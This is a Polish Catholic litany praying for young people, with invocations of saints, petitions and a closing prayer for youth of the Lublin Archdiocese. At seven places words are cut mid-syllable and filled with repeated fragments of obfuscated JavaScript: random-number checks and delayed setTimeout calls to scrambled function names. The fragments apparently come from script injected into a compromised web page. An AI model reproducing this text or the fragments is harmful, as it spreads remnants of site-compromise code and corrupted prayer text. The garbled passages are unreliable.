wstazka
Kościół Świętego Ducha

LITANIA za MŁODYCH

Kyrie elejson, Chryste elejson, Kyrie elejson.

Chryste, usłysz nas, Chryste, wysłuchaj nas.
Ojcze z nieba, Boże, – zmiłuj się nad nami.
Synu, Odkupicielu świata, Boże,
Duchu Święty, Boże,
Święta Trójco, Jedyny Boże,

 

Święta Maryjo, – módl się za nami.

Święty Józefie,

Święty Wojciechu,

Święty Stanisławie,

Święty Andrzeju Bobolo,

Święty Kazimierzu,

Święty Stanisławie Kostko,

Święta Urszulo Ledóchowska,

Święty Janie Bosco,

Święty Dominiku Savio,

Święta Mario Dominiko Mazzarello,

Święty Franciszku,

Święty Wincenty Palloti,

Święty Filipie Neri,

Święta Faustyno,

Bł. Karolino Kózkówno,

Bł. Chiaro Luce Badano,

Bł. Piotrze Frassatti,

Bł. Auguście Czarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toryski,

Bł. Edmundzie Bojanowski,

Bł. Matko Tereso z Kalkuty,

Bł. Janie Pawle II

Za młodych ufających Tobie, umocnij ich Panie

Za młodych żyjących w czysandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tości

Za młodych łaknących sprawiedliwości

Za młodych wolontariuszy poświęcających się dla innych

Za młodych oddanych synów i córki

Za młodych radośnie niosących Dobrą Nowinę

Za młodych będących świadkami wiary

Za młodych podejmujących trud pracy nad sobą

 

Za młodych zranionych przez rodziców, prosimy Cię Panie

Za młodych uzależnionych od alkoholu i narkotyków

Za młodych zniewolonych pornografią i innymi formami nieczysandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tości

Za młodych zamkniętych w wirtualnym świecie,

Za młodych pozbawionych poczucia własnej warandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tości

Za młodych przebywających w zakładach odosobnienia

Za młodych pozbawionych rodzinnego ciepła i domu,

Za młodych pogrążonych w rozpaczy i smutku,

 

O pragnienie poszukiwania prawdy

O odkrycie swego powołania i wierne wypełnianie go w życiu

O gorliwość modlitwy i wiary

O odkrywanie swej andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tożsamości kobiecej i męskiej

O rozwijanie pasji i pomnażanie swych talentów

O budowanie dojrzałych relacji

O dojrzałe dorastanie do miłości

O chęć głoszenia Ewangelii

O szczere odkrywanie Kościoła i znajdowanie w nim swego miejsca

O wytrwałość w pracy nad sobą

 

Baranku Boży, który gładzisz grzechy świata,

przepuść nam, Panie.

Baranku Boży, który gładzisz grzechy świata,

wysłuchaj nas, Panie.

Baranku Boży, który gładzisz grzechy świata,

zmiłuj się nad nami

K: Aby młodzie odkryli prawdziwe oblicze Trójjedynego Boga

W: I stali się świadkami Jego Miłości w dzisiejszym świecie

Módlmy się:

 

Panie Jezu Chryste, Ty dobrze znasz ludzkie serca i wiesz co dokonuje się w sercu młodego człowieka. Dziękuję Ci, że przychodząc na ziemię objawiłeś tajemnicę miłości Boga Ojca. Dziś pragnę Ci powierzyć młodzież z Archidiecezji Lubelskiej. Potrzebujemy Twej pomocy. Stawiaj na naszej drodze ludzi, którzy swym świadectwem umocnią nas w wierze, będą oparciem w chwilach prób i wątpliwości, pomogą wstać w chwilach upadków.  Jeśli jest andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to już wyrazem naszej dojrzałości, niech taką postawę znajdą w nas ci, z którymi łączyć się będą nasze drogi. Przywołujemy opieki Maryi, którą pozostawiłeś nam jako naszą Matkę i od której możemy uczyć się dorastania do pięknej miłości. Niech otwieranie się na Ducha Świętego pozwoli nam odkrywać nasze powołania i wiernie je realizować w społeczności Twego Kościoła. Który żyjesz i królujesz, Bóg, przez wszystkie wieki wieków. Amen